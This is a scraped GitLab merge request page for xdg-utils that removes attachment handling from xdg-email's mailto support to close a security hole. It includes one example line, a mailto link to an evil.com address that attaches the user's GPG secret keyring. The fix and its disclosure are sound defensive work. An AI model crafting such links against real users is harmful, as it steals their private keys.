xdg-email: remove attachment handling from mailto (!28) · Merge requests · xdg / xdg-utils

Snippets Groups Projects

Due to an influx of spam, we have had to impose restrictions on new accounts. Please see this wiki page for instructions on how to get full permissions. Sorry for the inconvenience.

The migration is almost done, at least the rest should happen in the background. There are still a few technical difference between the old cluster and the new ones, and they are summarized in this issue. Please pay attention to the TL:DR at the end of the comment.

Closed Jörg Thalheim requested to merge Mic92/xdg-utils:fix-mailto into master 4 years ago

This allows attacker to extract secrets from users:

mailto:sid@evil.com?attach=/.gnupg/secring.gpg

Signed-off-by: Jörg Thalheim joerg@thalheim.io

Activity

Please register or sign in to reply

Admin message

Admin message

xdg-email: remove attachment handling from mailto

Merge request reports

Activity